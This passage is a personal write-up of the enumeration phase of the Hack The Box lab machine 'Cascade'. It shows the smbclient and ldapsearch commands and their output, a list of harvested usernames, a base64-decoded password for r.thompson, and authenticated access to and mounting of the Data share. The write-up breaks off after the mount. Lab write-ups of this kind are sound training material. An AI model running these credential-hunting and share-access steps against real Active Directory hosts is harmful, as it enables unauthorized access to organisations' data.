Cascade
05-Nmap
10-Enumeration
15-Shares
20-Reverse Engineering
25-GetAdmin
10-Enumeration

SMB
...

➜  ldap smbclient -L ////10.10.10.182//                                          
Password for [WORKGROUP\nakul]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

LDAP
...

ldapsearch -H ldap://10.10.10.182 -x -s base namingcontexts > ldap.out

ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)'  > ldapseachObjectClass.out

I found potential usernames.

➜  ldap cat ldapseachObjectClass.out| grep sAMAccountName:        
sAMAccountName: CascGuest
sAMAccountName: CASC-DC1$
sAMAccountName: arksvc
sAMAccountName: s.smith
sAMAccountName: r.thompson
sAMAccountName: util
sAMAccountName: j.wakefield
sAMAccountName: s.hickson
sAMAccountName: j.goodhand
sAMAccountName: a.turnbull
sAMAccountName: e.crowe
sAMAccountName: b.hanson
sAMAccountName: d.burman
sAMAccountName: BackupSvc
sAMAccountName: j.allen
sAMAccountName: i.croft

Also when reading the smb file i also found a password which was encoded in base64
Pasted image 20240116180422.png

ldap echo 'clk0bjVldmE=' | base64 -d        
rY4n5eva

SMB again
...

➜  ldap smbclient -L  //10.10.10.182/ -U ""r.thompson@cascade.local%rY4n5eva""

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Audit$          Disk      
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share

I was able to read content of Data share.

➜  ldap smbclient  //10.10.10.182/Data -U ""r.thompson@cascade.local%rY4n5eva""
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 27 08:57:34 2020
  ..                                  D        0  Mon Jan 27 08:57:34 2020
  Contractors                         D        0  Mon Jan 13 07:15:11 2020
  Finance                             D        0  Mon Jan 13 07:15:06 2020
  IT                                  D        0  Tue Jan 28 23:34:51 2020
  Production                          D        0  Mon Jan 13 07:15:18 2020
  Temps                               D        0  Mon Jan 13 07:15:15 2020

                6553343 blocks of size 4096. 1625363 blocks available
smb: \>

Mounted the share on /mnt

sudo mount -t cifs //10.10.10.182/Data /mnt/htb/cascade -o username=r.thompson,password=rY4n5eva
Table Of Contents

10-Enumeration

SMB

LDAP

SMB again